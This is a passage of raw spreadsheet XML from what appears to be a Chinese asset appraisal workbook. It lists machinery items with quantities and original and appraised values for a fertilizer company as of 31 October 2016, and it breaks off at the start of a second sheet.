      <c r="C208" s="237" t="s">
        <v>2343</v>
      </c>
      <c r="D208" s="238" t="s">
        <v>1962</v>
      </c>
      <c r="E208" s="238" t="s">
        <v>2344</v>
      </c>
      <c r="F208" s="11"/>
      <c r="G208" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H208" s="11">
        <v>1</v>
      </c>
      <c r="I208" s="237" t="s">
        <v>2345</v>
      </c>
      <c r="J208" s="190">
        <v>5300</v>
      </c>
      <c r="K208" s="188">
        <v>0</v>
      </c>
      <c r="L208" s="246" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="209" customHeight="1" spans="2:12">
      <c r="B209" s="16">
        <v>155</v>
      </c>
      <c r="C209" s="237" t="s">
        <v>2346</v>
      </c>
      <c r="D209" s="239" t="s">
        <v>2347</v>
      </c>
      <c r="E209" s="237" t="s">
        <v>2348</v>
      </c>
      <c r="F209" s="180"/>
      <c r="G209" s="180" t="s">
        <v>466</v>
      </c>
      <c r="H209" s="11">
        <v>1</v>
      </c>
      <c r="I209" s="248" t="s">
        <v>1090</v>
      </c>
      <c r="J209" s="200">
        <v>19658.12</v>
      </c>
      <c r="K209" s="188">
        <v>3136</v>
      </c>
      <c r="L209" s="239" t="s">
        <v>1858</v>
      </c>
    </row>
    <row r="210" customHeight="1" spans="2:12">
      <c r="B210" s="16">
        <v>156</v>
      </c>
      <c r="C210" s="237" t="s">
        <v>2349</v>
      </c>
      <c r="D210" s="238" t="s">
        <v>2350</v>
      </c>
      <c r="E210" s="238" t="s">
        <v>2351</v>
      </c>
      <c r="F210" s="11"/>
      <c r="G210" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H210" s="11">
        <v>4</v>
      </c>
      <c r="I210" s="237" t="s">
        <v>2352</v>
      </c>
      <c r="J210" s="192">
        <v>45400</v>
      </c>
      <c r="K210" s="188">
        <v>3632</v>
      </c>
      <c r="L210" s="246" t="s">
        <v>2353</v>
      </c>
    </row>
    <row r="211" customHeight="1" spans="2:12">
      <c r="B211" s="16">
        <v>157</v>
      </c>
      <c r="C211" s="237" t="s">
        <v>2354</v>
      </c>
      <c r="D211" s="238" t="s">
        <v>2355</v>
      </c>
      <c r="E211" s="238" t="s">
        <v>2356</v>
      </c>
      <c r="F211" s="16"/>
      <c r="G211" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H211" s="11">
        <v>1</v>
      </c>
      <c r="I211" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J211" s="190">
        <v>900</v>
      </c>
      <c r="K211" s="188">
        <v>0</v>
      </c>
      <c r="L211" s="191"/>
    </row>
    <row r="212" customHeight="1" spans="2:12">
      <c r="B212" s="16">
        <v>158</v>
      </c>
      <c r="C212" s="237" t="s">
        <v>2357</v>
      </c>
      <c r="D212" s="238" t="s">
        <v>2011</v>
      </c>
      <c r="E212" s="238" t="s">
        <v>2358</v>
      </c>
      <c r="F212" s="11"/>
      <c r="G212" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H212" s="11">
        <v>1</v>
      </c>
      <c r="I212" s="247" t="s">
        <v>229</v>
      </c>
      <c r="J212" s="195">
        <v>3850</v>
      </c>
      <c r="K212" s="188">
        <v>154</v>
      </c>
      <c r="L212" s="191"/>
    </row>
    <row r="213" customHeight="1" spans="2:12">
      <c r="B213" s="16">
        <v>159</v>
      </c>
      <c r="C213" s="237" t="s">
        <v>2359</v>
      </c>
      <c r="D213" s="238" t="s">
        <v>2360</v>
      </c>
      <c r="E213" s="238" t="s">
        <v>2361</v>
      </c>
      <c r="F213" s="16"/>
      <c r="G213" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H213" s="11">
        <v>1</v>
      </c>
      <c r="I213" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J213" s="192">
        <v>3100</v>
      </c>
      <c r="K213" s="188">
        <v>0</v>
      </c>
      <c r="L213" s="191"/>
    </row>
    <row r="214" customHeight="1" spans="2:12">
      <c r="B214" s="16">
        <v>160</v>
      </c>
      <c r="C214" s="237" t="s">
        <v>2362</v>
      </c>
      <c r="D214" s="238" t="s">
        <v>2363</v>
      </c>
      <c r="E214" s="238" t="s">
        <v>2364</v>
      </c>
      <c r="F214" s="16"/>
      <c r="G214" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H214" s="11">
        <v>1</v>
      </c>
      <c r="I214" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J214" s="190">
        <v>810</v>
      </c>
      <c r="K214" s="188">
        <v>0</v>
      </c>
      <c r="L214" s="191"/>
    </row>
    <row r="215" customHeight="1" spans="2:12">
      <c r="B215" s="16">
        <v>161</v>
      </c>
      <c r="C215" s="237" t="s">
        <v>2365</v>
      </c>
      <c r="D215" s="238" t="s">
        <v>2366</v>
      </c>
      <c r="E215" s="238" t="s">
        <v>2367</v>
      </c>
      <c r="F215" s="11"/>
      <c r="G215" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H215" s="11">
        <v>1</v>
      </c>
      <c r="I215" s="247" t="s">
        <v>229</v>
      </c>
      <c r="J215" s="193">
        <v>750</v>
      </c>
      <c r="K215" s="188">
        <v>30</v>
      </c>
      <c r="L215" s="191"/>
    </row>
    <row r="216" customHeight="1" spans="2:12">
      <c r="B216" s="16">
        <v>162</v>
      </c>
      <c r="C216" s="237" t="s">
        <v>2368</v>
      </c>
      <c r="D216" s="238" t="s">
        <v>2369</v>
      </c>
      <c r="E216" s="238" t="s">
        <v>2370</v>
      </c>
      <c r="F216" s="11"/>
      <c r="G216" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H216" s="11">
        <v>1</v>
      </c>
      <c r="I216" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J216" s="192">
        <v>5600</v>
      </c>
      <c r="K216" s="188">
        <v>224</v>
      </c>
      <c r="L216" s="191"/>
    </row>
    <row r="217" customHeight="1" spans="2:12">
      <c r="B217" s="16">
        <v>163</v>
      </c>
      <c r="C217" s="237" t="s">
        <v>2371</v>
      </c>
      <c r="D217" s="238" t="s">
        <v>2372</v>
      </c>
      <c r="E217" s="238" t="s">
        <v>2373</v>
      </c>
      <c r="F217" s="11"/>
      <c r="G217" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H217" s="11">
        <v>1</v>
      </c>
      <c r="I217" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J217" s="192">
        <v>1500</v>
      </c>
      <c r="K217" s="188">
        <v>60</v>
      </c>
      <c r="L217" s="191"/>
    </row>
    <row r="218" customHeight="1" spans="2:12">
      <c r="B218" s="16">
        <v>164</v>
      </c>
      <c r="C218" s="237" t="s">
        <v>2374</v>
      </c>
      <c r="D218" s="238" t="s">
        <v>2375</v>
      </c>
      <c r="E218" s="238" t="s">
        <v>2376</v>
      </c>
      <c r="F218" s="11"/>
      <c r="G218" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H218" s="11">
        <v>1</v>
      </c>
      <c r="I218" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J218" s="192">
        <v>4600</v>
      </c>
      <c r="K218" s="188">
        <v>184</v>
      </c>
      <c r="L218" s="191"/>
    </row>
    <row r="219" customHeight="1" spans="2:12">
      <c r="B219" s="16">
        <v>165</v>
      </c>
      <c r="C219" s="237" t="s">
        <v>2377</v>
      </c>
      <c r="D219" s="238" t="s">
        <v>2378</v>
      </c>
      <c r="E219" s="238" t="s">
        <v>2379</v>
      </c>
      <c r="F219" s="11"/>
      <c r="G219" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H219" s="11">
        <v>1</v>
      </c>
      <c r="I219" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J219" s="192">
        <v>4000</v>
      </c>
      <c r="K219" s="188">
        <v>160</v>
      </c>
      <c r="L219" s="191"/>
    </row>
    <row r="220" customHeight="1" spans="2:12">
      <c r="B220" s="16">
        <v>166</v>
      </c>
      <c r="C220" s="237" t="s">
        <v>2380</v>
      </c>
      <c r="D220" s="238" t="s">
        <v>2177</v>
      </c>
      <c r="E220" s="238" t="s">
        <v>2241</v>
      </c>
      <c r="F220" s="16"/>
      <c r="G220" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H220" s="11">
        <v>4</v>
      </c>
      <c r="I220" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J220" s="192">
        <v>16800</v>
      </c>
      <c r="K220" s="188">
        <v>0</v>
      </c>
      <c r="L220" s="191"/>
    </row>
    <row r="221" customHeight="1" spans="2:12">
      <c r="B221" s="16">
        <v>167</v>
      </c>
      <c r="C221" s="237" t="s">
        <v>2381</v>
      </c>
      <c r="D221" s="238" t="s">
        <v>2009</v>
      </c>
      <c r="E221" s="238" t="s">
        <v>2382</v>
      </c>
      <c r="F221" s="11"/>
      <c r="G221" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H221" s="11">
        <v>2</v>
      </c>
      <c r="I221" s="247" t="s">
        <v>229</v>
      </c>
      <c r="J221" s="195">
        <v>6600</v>
      </c>
      <c r="K221" s="188">
        <v>264</v>
      </c>
      <c r="L221" s="191"/>
    </row>
    <row r="222" customHeight="1" spans="2:12">
      <c r="B222" s="16">
        <v>168</v>
      </c>
      <c r="C222" s="237" t="s">
        <v>2383</v>
      </c>
      <c r="D222" s="238" t="s">
        <v>2013</v>
      </c>
      <c r="E222" s="238" t="s">
        <v>2384</v>
      </c>
      <c r="F222" s="11"/>
      <c r="G222" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H222" s="11">
        <v>5</v>
      </c>
      <c r="I222" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J222" s="192">
        <v>15600</v>
      </c>
      <c r="K222" s="188">
        <v>624</v>
      </c>
      <c r="L222" s="191"/>
    </row>
    <row r="223" customHeight="1" spans="2:12">
      <c r="B223" s="16">
        <v>169</v>
      </c>
      <c r="C223" s="237" t="s">
        <v>2385</v>
      </c>
      <c r="D223" s="238" t="s">
        <v>2386</v>
      </c>
      <c r="E223" s="16"/>
      <c r="F223" s="16"/>
      <c r="G223" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H223" s="11">
        <v>2</v>
      </c>
      <c r="I223" s="237" t="s">
        <v>978</v>
      </c>
      <c r="J223" s="192">
        <v>4800</v>
      </c>
      <c r="K223" s="188">
        <v>0</v>
      </c>
      <c r="L223" s="96"/>
    </row>
    <row r="224" customHeight="1" spans="2:12">
      <c r="B224" s="16">
        <v>170</v>
      </c>
      <c r="C224" s="237" t="s">
        <v>2387</v>
      </c>
      <c r="D224" s="238" t="s">
        <v>2060</v>
      </c>
      <c r="E224" s="238" t="s">
        <v>2388</v>
      </c>
      <c r="F224" s="11" t="s">
        <v>2160</v>
      </c>
      <c r="G224" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H224" s="11">
        <v>2</v>
      </c>
      <c r="I224" s="182">
        <v>2011</v>
      </c>
      <c r="J224" s="195">
        <v>12000</v>
      </c>
      <c r="K224" s="188">
        <v>5760</v>
      </c>
      <c r="L224" s="96"/>
    </row>
    <row r="225" customHeight="1" spans="2:12">
      <c r="B225" s="16">
        <v>171</v>
      </c>
      <c r="C225" s="16"/>
      <c r="D225" s="16" t="s">
        <v>2389</v>
      </c>
      <c r="E225" s="16"/>
      <c r="F225" s="16"/>
      <c r="G225" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H225" s="16">
        <v>1</v>
      </c>
      <c r="I225" s="201"/>
      <c r="J225" s="201"/>
      <c r="K225" s="188">
        <v>800</v>
      </c>
      <c r="L225" s="16"/>
    </row>
    <row r="226" customHeight="1" spans="2:12">
      <c r="B226" s="16">
        <v>172</v>
      </c>
      <c r="C226" s="16"/>
      <c r="D226" s="16" t="s">
        <v>2124</v>
      </c>
      <c r="E226" s="16"/>
      <c r="F226" s="16"/>
      <c r="G226" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H226" s="16">
        <v>4</v>
      </c>
      <c r="I226" s="201"/>
      <c r="J226" s="201"/>
      <c r="K226" s="188">
        <v>160</v>
      </c>
      <c r="L226" s="16" t="s">
        <v>2390</v>
      </c>
    </row>
    <row r="227" customHeight="1" spans="2:12">
      <c r="B227" s="16">
        <v>173</v>
      </c>
      <c r="C227" s="16"/>
      <c r="D227" s="16" t="s">
        <v>2391</v>
      </c>
      <c r="E227" s="16"/>
      <c r="F227" s="16"/>
      <c r="G227" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H227" s="16">
        <v>2</v>
      </c>
      <c r="I227" s="201"/>
      <c r="J227" s="201"/>
      <c r="K227" s="188">
        <v>480</v>
      </c>
      <c r="L227" s="16" t="s">
        <v>2390</v>
      </c>
    </row>
    <row r="228" customHeight="1" spans="2:12">
      <c r="B228" s="16">
        <v>174</v>
      </c>
      <c r="C228" s="16"/>
      <c r="D228" s="16" t="s">
        <v>2392</v>
      </c>
      <c r="E228" s="16"/>
      <c r="F228" s="16"/>
      <c r="G228" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H228" s="16">
        <v>1</v>
      </c>
      <c r="I228" s="201"/>
      <c r="J228" s="201"/>
      <c r="K228" s="188">
        <v>200</v>
      </c>
      <c r="L228" s="16" t="s">
        <v>1068</v>
      </c>
    </row>
    <row r="229" customHeight="1" spans="2:12">
      <c r="B229" s="16">
        <v>175</v>
      </c>
      <c r="C229" s="16"/>
      <c r="D229" s="16" t="s">
        <v>2065</v>
      </c>
      <c r="E229" s="16"/>
      <c r="F229" s="16"/>
      <c r="G229" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H229" s="16">
        <v>1</v>
      </c>
      <c r="I229" s="201"/>
      <c r="J229" s="201"/>
      <c r="K229" s="188">
        <v>400</v>
      </c>
      <c r="L229" s="16" t="s">
        <v>1068</v>
      </c>
    </row>
    <row r="230" customHeight="1" spans="2:12">
      <c r="B230" s="16">
        <v>176</v>
      </c>
      <c r="C230" s="197"/>
      <c r="D230" s="197" t="s">
        <v>2147</v>
      </c>
      <c r="E230" s="197"/>
      <c r="F230" s="197"/>
      <c r="G230" s="197" t="s">
        <v>2125</v>
      </c>
      <c r="H230" s="197">
        <v>4</v>
      </c>
      <c r="I230" s="202"/>
      <c r="J230" s="202"/>
      <c r="K230" s="188">
        <v>32</v>
      </c>
      <c r="L230" s="16" t="s">
        <v>2393</v>
      </c>
    </row>
    <row r="231" customHeight="1" spans="2:12">
      <c r="B231" s="16">
        <v>177</v>
      </c>
      <c r="C231" s="16" t="s">
        <v>2394</v>
      </c>
      <c r="D231" s="16" t="s">
        <v>2065</v>
      </c>
      <c r="E231" s="16"/>
      <c r="F231" s="16"/>
      <c r="G231" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H231" s="16">
        <v>3</v>
      </c>
      <c r="I231" s="201"/>
      <c r="J231" s="201"/>
      <c r="K231" s="188">
        <v>1200</v>
      </c>
      <c r="L231" s="16" t="s">
        <v>2394</v>
      </c>
    </row>
    <row r="232" customHeight="1" spans="2:12">
      <c r="B232" s="16">
        <v>178</v>
      </c>
      <c r="C232" s="16"/>
      <c r="D232" s="16" t="s">
        <v>2124</v>
      </c>
      <c r="E232" s="16"/>
      <c r="F232" s="16"/>
      <c r="G232" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H232" s="16">
        <v>1</v>
      </c>
      <c r="I232" s="201"/>
      <c r="J232" s="201"/>
      <c r="K232" s="188">
        <v>40</v>
      </c>
      <c r="L232" s="16" t="s">
        <v>2394</v>
      </c>
    </row>
    <row r="233" customHeight="1" spans="2:12">
      <c r="B233" s="16">
        <v>179</v>
      </c>
      <c r="C233" s="16"/>
      <c r="D233" s="16" t="s">
        <v>2147</v>
      </c>
      <c r="E233" s="16"/>
      <c r="F233" s="16"/>
      <c r="G233" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H233" s="16">
        <v>6</v>
      </c>
      <c r="I233" s="201"/>
      <c r="J233" s="201"/>
      <c r="K233" s="188">
        <v>48</v>
      </c>
      <c r="L233" s="16" t="s">
        <v>2394</v>
      </c>
    </row>
    <row r="234" customHeight="1" spans="2:12">
      <c r="B234" s="16">
        <v>180</v>
      </c>
      <c r="C234" s="16" t="s">
        <v>726</v>
      </c>
      <c r="D234" s="16" t="s">
        <v>2275</v>
      </c>
      <c r="E234" s="16"/>
      <c r="F234" s="16" t="s">
        <v>2395</v>
      </c>
      <c r="G234" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H234" s="16">
        <v>10</v>
      </c>
      <c r="I234" s="201"/>
      <c r="J234" s="201"/>
      <c r="K234" s="188">
        <v>2400</v>
      </c>
      <c r="L234" s="16" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="235" customHeight="1" spans="2:12">
      <c r="B235" s="16">
        <v>181</v>
      </c>
      <c r="C235" s="16"/>
      <c r="D235" s="16" t="s">
        <v>2011</v>
      </c>
      <c r="E235" s="16"/>
      <c r="F235" s="16" t="s">
        <v>2395</v>
      </c>
      <c r="G235" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H235" s="16">
        <v>35</v>
      </c>
      <c r="I235" s="201"/>
      <c r="J235" s="201"/>
      <c r="K235" s="188">
        <v>5600</v>
      </c>
      <c r="L235" s="16" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="236" customHeight="1" spans="2:12">
      <c r="B236" s="16">
        <v>182</v>
      </c>
      <c r="C236" s="16"/>
      <c r="D236" s="16" t="s">
        <v>2396</v>
      </c>
      <c r="E236" s="16"/>
      <c r="F236" s="16" t="s">
        <v>2397</v>
      </c>
      <c r="G236" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H236" s="16">
        <v>2</v>
      </c>
      <c r="I236" s="201"/>
      <c r="J236" s="201"/>
      <c r="K236" s="188">
        <v>1600</v>
      </c>
      <c r="L236" s="16" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="237" customHeight="1" spans="2:12">
      <c r="B237" s="16">
        <v>183</v>
      </c>
      <c r="C237" s="16"/>
      <c r="D237" s="16" t="s">
        <v>2398</v>
      </c>
      <c r="E237" s="16"/>
      <c r="F237" s="16" t="s">
        <v>2399</v>
      </c>
      <c r="G237" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H237" s="16">
        <v>4</v>
      </c>
      <c r="I237" s="201"/>
      <c r="J237" s="201"/>
      <c r="K237" s="188">
        <v>6400</v>
      </c>
      <c r="L237" s="16" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="238" customHeight="1" spans="2:12">
      <c r="B238" s="16">
        <v>184</v>
      </c>
      <c r="C238" s="16"/>
      <c r="D238" s="16" t="s">
        <v>2400</v>
      </c>
      <c r="E238" s="16"/>
      <c r="F238" s="16" t="s">
        <v>2399</v>
      </c>
      <c r="G238" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H238" s="16">
        <v>5</v>
      </c>
      <c r="I238" s="201"/>
      <c r="J238" s="201"/>
      <c r="K238" s="188">
        <v>4000</v>
      </c>
      <c r="L238" s="16" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="239" customHeight="1" spans="2:12">
      <c r="B239" s="16"/>
      <c r="C239" s="16"/>
      <c r="D239" s="16"/>
      <c r="E239" s="16"/>
      <c r="F239" s="16"/>
      <c r="G239" s="16"/>
      <c r="H239" s="16"/>
      <c r="I239" s="201"/>
      <c r="J239" s="201"/>
      <c r="K239" s="188">
        <v>0</v>
      </c>
      <c r="L239" s="16"/>
    </row>
    <row r="240" customHeight="1" spans="2:12">
      <c r="B240" s="16"/>
      <c r="C240" s="16"/>
      <c r="D240" s="16"/>
      <c r="E240" s="16"/>
      <c r="F240" s="16"/>
      <c r="G240" s="16"/>
      <c r="H240" s="16"/>
      <c r="I240" s="201"/>
      <c r="J240" s="201"/>
      <c r="K240" s="188">
        <v>0</v>
      </c>
      <c r="L240" s="16"/>
    </row>
    <row r="241" customHeight="1" spans="2:12">
      <c r="B241" s="134" t="s">
        <v>1360</v>
      </c>
      <c r="C241" s="134"/>
      <c r="D241" s="134"/>
      <c r="E241" s="16"/>
      <c r="F241" s="16"/>
      <c r="G241" s="16"/>
      <c r="H241" s="198">
        <v>798</v>
      </c>
      <c r="I241" s="100"/>
      <c r="J241" s="100">
        <v>5418361.66</v>
      </c>
      <c r="K241" s="188">
        <v>593588.8</v>
      </c>
      <c r="L241" s="16"/>
    </row>
  </sheetData>
  <mergeCells count="15">
    <mergeCell ref="B1:K1"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:L3"/>
    <mergeCell ref="B241:D241"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="K5:K6"/>
    <mergeCell ref="L5:L6"/>
  </mergeCells>
  <pageMargins left="0.719444444444444" right="0.579861111111111" top="1.82986111111111" bottom="0.769444444444444" header="0.929861111111111" footer="0.539583333333333"/>
  <pageSetup paperSize="9" scale="75" orientation="landscape" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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B1:M123"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B1" sqref="B1:L3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.375" defaultRowHeight="22.5" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="10.375" style="142"/>
    <col min="2" max="2" width="6.375" style="143" customWidth="1"/>
    <col min="3" max="3" width="10.375" style="143" customWidth="1"/>
    <col min="4" max="4" width="21.375" style="143" customWidth="1"/>
    <col min="5" max="5" width="25" style="144" customWidth="1"/>
    <col min="6" max="6" width="11.375" style="142" customWidth="1"/>
    <col min="7" max="7" width="6" style="143" customWidth="1"/>
    <col min="8" max="8" width="4.875" style="143" customWidth="1"/>
    <col min="9" max="9" width="10.375" style="143" customWidth="1"/>
    <col min="10" max="10" width="13.25" style="142" customWidth="1"/>
    <col min="11" max="11" width="12.875" style="145" customWidth="1"/>
    <col min="12" max="12" width="20.75" style="144" customWidth="1"/>
    <col min="13" max="13" width="13" style="143" customWidth="1"/>
    <col min="14" max="16384" width="10.375" style="142"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="2:12">
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="1"/>
    </row>
    <row r="2" customHeight="1" spans="2:12">
      <c r="B2" s="1"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
    </row>
    <row r="3" customHeight="1" spans="2:13">
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
      <c r="M3" s="142"/>
    </row>
    <row r="5" customHeight="1" spans="2:13">
      <c r="B5" s="146" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="146" t="s">
        <v>210</v>
      </c>
      <c r="D5" s="147" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="147" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="147" t="s">
        <v>213</v>
      </c>
      <c r="G5" s="146" t="s">
        <v>214</v>
      </c>
      <c r="H5" s="146" t="s">
        <v>215</v>
      </c>
      <c r="I5" s="146" t="s">
        <v>216</v>
      </c>
      <c r="J5" s="146" t="s">
        <v>2401</v>
      </c>
      <c r="K5" s="146"/>
      <c r="L5" s="147" t="s">
        <v>2402</v>
      </c>
      <c r="M5" s="146" t="s">
        <v>2403</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="2:13">
      <c r="B6" s="146"/>
      <c r="C6" s="146"/>
      <c r="D6" s="147"/>
      <c r="E6" s="147"/>
      <c r="F6" s="147"/>
      <c r="G6" s="146"/>
      <c r="H6" s="146"/>
      <c r="I6" s="146"/>
      <c r="J6" s="157" t="s">
        <v>2404</v>
      </c>
      <c r="K6" s="158" t="s">
        <v>2405</v>
      </c>
      <c r="L6" s="147"/>
      <c r="M6" s="146"/>
    </row>
    <row r="7" customHeight="1" spans="2:13">
      <c r="B7" s="148">
        <v>1</v>
      </c>
      <c r="C7" s="249" t="s">
        <v>2406</v>
      </c>
      <c r="D7" s="250" t="s">
        <v>1522</v>
      </c>
      <c r="E7" s="150" t="s">
        <v>2407</v>
      </c>
      <c r="F7" s="151" t="s">
        <v>1524</v>
      </c>
      <c r="G7" s="148" t="s">
        <v>223</v>
      </c>
      <c r="H7" s="148">
        <v>1</v>
      </c>
      <c r="I7" s="148">
        <v>2009</v>
      </c>
      <c r="J7" s="159">
        <v>54401.8</v>
      </c>
      <c r="K7" s="160">
        <v>21760</v>
      </c>
      <c r="L7" s="150"/>
      <c r="M7" s="249" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:13">
      <c r="B8" s="148">
        <v>2</v>
      </c>
      <c r="C8" s="251" t="s">
        <v>2409</v>
      </c>
      <c r="D8" s="252" t="s">
        <v>2410</v>
      </c>
      <c r="E8" s="253" t="s">
        <v>2411</v>
      </c>
      <c r="F8" s="155" t="s">
        <v>2412</v>
      </c>
      <c r="G8" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H8" s="152">
        <v>1</v>
      </c>
      <c r="I8" s="251" t="s">
        <v>2413</v>
      </c>
      <c r="J8" s="161">
        <v>249801.58</v>
      </c>
      <c r="K8" s="160">
        <v>89928</v>
      </c>
      <c r="L8" s="154" t="s">
        <v>2414</v>
      </c>
      <c r="M8" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:13">
      <c r="B9" s="148">
        <v>3</v>
      </c>
      <c r="C9" s="251" t="s">
        <v>2415</v>
      </c>
      <c r="D9" s="252" t="s">
        <v>2416</v>
      </c>
      <c r="E9" s="154" t="s">
        <v>2417</v>
      </c>
      <c r="F9" s="155"/>
      <c r="G9" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H9" s="152">
        <v>1</v>
      </c>
      <c r="I9" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J9" s="161">
        <v>511559.58</v>
      </c>
      <c r="K9" s="160">
        <v>135036</v>
      </c>
      <c r="L9" s="154"/>
      <c r="M9" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="2:13">
      <c r="B10" s="148">
        <v>4</v>
      </c>
      <c r="C10" s="251" t="s">
        <v>2419</v>
      </c>
      <c r="D10" s="252" t="s">
        <v>2420</v>
      </c>
      <c r="E10" s="253" t="s">
        <v>2421</v>
      </c>
      <c r="F10" s="155"/>
      <c r="G10" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H10" s="152">
        <v>1</v>
      </c>
      <c r="I10" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J10" s="161">
        <v>17100</v>
      </c>
      <c r="K10" s="160">
        <v>4788</v>
      </c>
      <c r="L10" s="154"/>
      <c r="M10" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="2:13">
      <c r="B11" s="148">
        <v>5</v>
      </c>
      <c r="C11" s="251" t="s">
        <v>2422</v>
      </c>
      <c r="D11" s="252" t="s">
        <v>2423</v>
      </c>
      <c r="E11" s="254" t="s">
        <v>2424</v>
      </c>
      <c r="F11" s="155"/>
      <c r="G11" s="152" t="s">
        <v>1191</v>
      </c>
      <c r="H11" s="152">
        <v>70</v>
      </c>
      <c r="I11" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J11" s="161">
        <v>106541.47</v>
      </c>
      <c r="K11" s="160">
        <v>29820</v>
      </c>
      <c r="L11" s="154"/>
      <c r="M11" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="2:13">
      <c r="B12" s="148">
        <v>6</v>
      </c>
      <c r="C12" s="251" t="s">
        <v>2425</v>
      </c>
      <c r="D12" s="252" t="s">
        <v>2426</v>
      </c>
      <c r="E12" s="253" t="s">
        <v>2427</v>
      </c>
      <c r="F12" s="155" t="s">
        <v>2428</v>
      </c>
      <c r="G12" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H12" s="152">
        <v>1</v>
      </c>
      <c r="I12" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J12" s="161">
        <v>19371</v>
      </c>
      <c r="K12" s="160">
        <v>5423.6</v>
      </c>
      <c r="L12" s="154"/>
      <c r="M12" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="2:13">
      <c r="B13" s="148">
        <v>7</v>
      </c>
      <c r="C13" s="251" t="s">
        <v>2429</v>
      </c>
